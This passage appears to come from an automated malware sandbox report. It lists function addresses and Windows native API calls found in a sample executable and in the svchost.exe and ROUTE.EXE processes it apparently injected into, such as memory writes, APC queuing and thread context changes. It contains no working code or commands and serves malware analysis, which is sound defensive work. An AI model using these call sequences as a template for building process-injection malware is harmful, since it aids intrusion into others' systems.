                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72EA0 NtAdjustPrivilegesToken,1_2_03B72EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72E80 NtReadVirtualMemory,1_2_03B72E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72EE0 NtQueueApcThread,1_2_03B72EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72E30 NtWriteVirtualMemory,1_2_03B72E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72DB0 NtEnumerateKey,1_2_03B72DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72DD0 NtDelayExecution,1_2_03B72DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72D30 NtUnmapViewOfSection,1_2_03B72D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72D10 NtMapViewOfSection,1_2_03B72D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72D00 NtSetInformationFile,1_2_03B72D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72CA0 NtQueryInformationToken,1_2_03B72CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72CF0 NtOpenProcess,1_2_03B72CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72CC0 NtQueryVirtualMemory,1_2_03B72CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72C00 NtQueryInformationProcess,1_2_03B72C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B72C60 NtCreateKey,1_2_03B72C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B73090 NtSetValueKey,1_2_03B73090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B73010 NtOpenDirectoryObject,1_2_03B73010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B739B0 NtGetContextThread,1_2_03B739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B73D10 NtOpenProcessToken,1_2_03B73D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B73D70 NtOpenThread,1_2_03B73D70
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_03084340 NtSetContextThread,LdrInitializeThunk,6_2_03084340
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_03084650 NtSuspendThread,LdrInitializeThunk,6_2_03084650
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_03082B60 NtClose,LdrInitializeThunk,6_2_03082B60
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_03082BA0 NtEnumerateValueKey,LdrInitializeThunk,6_2_03082BA0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_03082BE0 NtQueryValueKey,LdrInitializeThunk,6_2_03082BE0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_03082BF0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_03082BF0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_03082AD0 NtReadFile,LdrInitializeThunk,6_2_03082AD0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_03082AF0 NtWriteFile,LdrInitializeThunk,6_2_03082AF0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_03082F30 NtCreateSection,LdrInitializeThunk,6_2_03082F30
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_03082FB0 NtResumeThread,LdrInitializeThunk,6_2_03082FB0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_03082FE0 NtCreateFile,LdrInitializeThunk,6_2_03082FE0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_03082E80 NtReadVirtualMemory,LdrInitializeThunk,6_2_03082E80
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_03082EE0 NtQueueApcThread,LdrInitializeThunk,6_2_03082EE0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_03082D10 NtMapViewOfSection,LdrInitializeThunk,6_2_03082D10
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_03082D30 NtUnmapViewOfSection,LdrInitializeThunk,6_2_03082D30
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_03082DD0 NtDelayExecution,LdrInitializeThunk,6_2_03082DD0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_03082DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_03082DF0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_03082C60 NtCreateKey,LdrInitializeThunk,6_2_03082C60
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_03082C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_03082C70
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_03082CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_03082CA0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_030835C0 NtCreateMutant,LdrInitializeThunk,6_2_030835C0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_030839B0 NtGetContextThread,LdrInitializeThunk,6_2_030839B0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_03082B80 NtQueryInformationFile,6_2_03082B80
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_03082AB0 NtWaitForSingleObject,6_2_03082AB0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_03082F60 NtCreateProcessEx,6_2_03082F60
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_03082F90 NtProtectVirtualMemory,6_2_03082F90
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_03082FA0 NtQuerySection,6_2_03082FA0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_03082E30 NtWriteVirtualMemory,6_2_03082E30
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_03082EA0 NtAdjustPrivilegesToken,6_2_03082EA0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_03082D00 NtSetInformationFile,6_2_03082D00
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_03082DB0 NtEnumerateKey,6_2_03082DB0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_03082C00 NtQueryInformationProcess,6_2_03082C00
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_03082CC0 NtQueryVirtualMemory,6_2_03082CC0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_03082CF0 NtOpenProcess,6_2_03082CF0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_03083010 NtOpenDirectoryObject,6_2_03083010
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_03083090 NtSetValueKey,6_2_03083090
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_03083D10 NtOpenProcessToken,6_2_03083D10
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_03083D70 NtOpenThread,6_2_03083D70
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_02919730 NtCreateFile,6_2_02919730
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_02919A30 NtClose,6_2_02919A30
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_02919BA0 NtAllocateVirtualMemory,6_2_02919BA0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_029198A0 NtReadFile,6_2_029198A0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_02919990 NtDeleteFile,6_2_02919990
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00CCA1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00CCA1EF
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00CB8310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00CB8310
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00CC51BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00CC51BD
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00C6E6A00_2_00C6E6A0
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00C8D9750_2_00C8D975
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00C6FCE00_2_00C6FCE0
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00C821C50_2_00C821C5
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00C962D20_2_00C962D2
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00CE03DA0_2_00CE03DA
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00C9242E0_2_00C9242E
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00C825FA0_2_00C825FA
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00C766E10_2_00C766E1
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00CBE6160_2_00CBE616
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00C9878F0_2_00C9878F
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00CC88890_2_00CC8889
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00C968440_2_00C96844
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00CE08570_2_00CE0857
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00C788080_2_00C78808
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00C8CB210_2_00C8CB21
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00C96DB60_2_00C96DB6
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00C76F9E0_2_00C76F9E
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00C730300_2_00C73030
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00C8F1D90_2_00C8F1D9
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00C831870_2_00C83187
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00C612870_2_00C61287
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00C814840_2_00C81484
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00C755200_2_00C75520
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00C876960_2_00C87696
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00C757600_2_00C75760
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00C819780_2_00C81978
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00C99AB50_2_00C99AB5
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00CE7DDB0_2_00CE7DDB
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00C81D900_2_00C81D90
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00C8BDA60_2_00C8BDA6
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00C73FE00_2_00C73FE0
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_00C6DF000_2_00C6DF00
                Source: C:\Users\user\Desktop\CJE003889.exeCode function: 0_2_010168000_2_01016800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00418A931_2_00418A93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004011D01_2_004011D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042F2431_2_0042F243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402A5C1_2_00402A5C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402A601_2_00402A60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004022C01_2_004022C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0041028D1_2_0041028D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004102931_2_00410293
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040E4931_2_0040E493
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00416C9E1_2_00416C9E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00416CA31_2_00416CA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004104B31_2_004104B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040E5E31_2_0040E5E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040E5E81_2_0040E5E8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004025801_2_00402580
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402F301_2_00402F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C003E61_2_03C003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4E3F01_2_03B4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BFA3521_2_03BFA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC02C01_2_03BC02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE02741_2_03BE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF41A21_2_03BF41A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C001AA1_2_03C001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF81CC1_2_03BF81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDA1181_2_03BDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B301001_2_03B30100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BC81581_2_03BC8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BD20001_2_03BD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3C7C01_2_03B3C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B407701_2_03B40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B647501_2_03B64750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5C6E01_2_03B5C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C005911_2_03C00591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B405351_2_03B40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BEE4F61_2_03BEE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE44201_2_03BE4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF24461_2_03BF2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF6BD71_2_03BF6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BFAB401_2_03BFAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3EA801_2_03B3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B429A01_2_03B429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C0A9A61_2_03C0A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B569621_2_03B56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B268B81_2_03B268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B6E8F01_2_03B6E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4A8401_2_03B4A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B428401_2_03B42840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BBEFA01_2_03BBEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B32FC81_2_03B32FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B60F301_2_03B60F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE2F301_2_03BE2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B82F281_2_03B82F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB4F401_2_03BB4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B52E901_2_03B52E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BFCE931_2_03BFCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BFEEDB1_2_03BFEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BFEE261_2_03BFEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40E591_2_03B40E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B58DBF1_2_03B58DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B3ADE01_2_03B3ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDCD1F1_2_03BDCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4AD001_2_03B4AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE0CB51_2_03BE0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B30CF21_2_03B30CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B40C001_2_03B40C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B8739A1_2_03B8739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF132D1_2_03BF132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2D34C1_2_03B2D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B452A01_2_03B452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5D2F01_2_03B5D2F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE12ED1_2_03BE12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5B2C01_2_03B5B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B4B1B01_2_03B4B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C0B16B1_2_03C0B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B2F1721_2_03B2F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B7516C1_2_03B7516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF70E91_2_03BF70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BFF0E01_2_03BFF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BEF0CC1_2_03BEF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B470C01_2_03B470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BFF7B01_2_03BFF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF16CC1_2_03BF16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B856301_2_03B85630
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C095C31_2_03C095C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDD5B01_2_03BDD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF75711_2_03BF7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BFF43F1_2_03BFF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B314601_2_03B31460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5FB801_2_03B5FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB5BF01_2_03BB5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B7DBF91_2_03B7DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BFFB761_2_03BFFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDDAAC1_2_03BDDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B85AA01_2_03B85AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE1AA31_2_03BE1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BEDAC61_2_03BEDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB3A6C1_2_03BB3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BFFA491_2_03BFFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF7A461_2_03BF7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BD59101_2_03BD5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B499501_2_03B49950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5B9501_2_03B5B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B438E01_2_03B438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BAD8001_2_03BAD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BFFFB11_2_03BFFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B41F921_2_03B41F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B03FD21_2_03B03FD2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B03FD51_2_03B03FD5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BFFF091_2_03BFFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B49EB01_2_03B49EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B5FDC01_2_03B5FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF7D731_2_03BF7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF1D5A1_2_03BF1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B43D401_2_03B43D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BFFCF21_2_03BFFCF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB9C321_2_03BB9C32
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0310A3526_2_0310A352
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0305E3F06_2_0305E3F0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_031103E66_2_031103E6
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_030F02746_2_030F0274
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_030D02C06_2_030D02C0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_030401006_2_03040100
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_030EA1186_2_030EA118
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_030D81586_2_030D8158
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_031041A26_2_031041A2
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_031101AA6_2_031101AA
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_031081CC6_2_031081CC
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_030E20006_2_030E2000
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_030747506_2_03074750
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_030507706_2_03050770
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0304C7C06_2_0304C7C0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0306C6E06_2_0306C6E0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_030505356_2_03050535
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_031105916_2_03110591
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_030F44206_2_030F4420
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_031024466_2_03102446
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_030FE4F66_2_030FE4F6
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0310AB406_2_0310AB40
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_03106BD76_2_03106BD7
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0304EA806_2_0304EA80
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_030669626_2_03066962
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_030529A06_2_030529A0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0311A9A66_2_0311A9A6
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_030528406_2_03052840
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0305A8406_2_0305A840
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_030368B86_2_030368B8
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0307E8F06_2_0307E8F0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_03092F286_2_03092F28
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_03070F306_2_03070F30
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_030F2F306_2_030F2F30
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_030C4F406_2_030C4F40
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_030CEFA06_2_030CEFA0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_03042FC86_2_03042FC8
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0310EE266_2_0310EE26
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_03050E596_2_03050E59
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0310CE936_2_0310CE93
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_03062E906_2_03062E90
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0310EEDB6_2_0310EEDB
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0305AD006_2_0305AD00
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_030ECD1F6_2_030ECD1F
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_03068DBF6_2_03068DBF
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0304ADE06_2_0304ADE0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_03050C006_2_03050C00
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_030F0CB56_2_030F0CB5
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_03040CF26_2_03040CF2
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0310132D6_2_0310132D
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0303D34C6_2_0303D34C
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0309739A6_2_0309739A
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_030552A06_2_030552A0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0306B2C06_2_0306B2C0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_030F12ED6_2_030F12ED
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0306D2F06_2_0306D2F0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0308516C6_2_0308516C
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0303F1726_2_0303F172
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0311B16B6_2_0311B16B
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0305B1B06_2_0305B1B0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_030FF0CC6_2_030FF0CC
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_030570C06_2_030570C0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0310F0E06_2_0310F0E0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_031070E96_2_031070E9
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_0310F7B06_2_0310F7B0
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_030956306_2_03095630
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_031016CC6_2_031016CC
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_031075716_2_03107571
                Source: C:\Windows\SysWOW64\ROUTE.EXECode function: 6_2_030ED5B06_2_030ED5B0
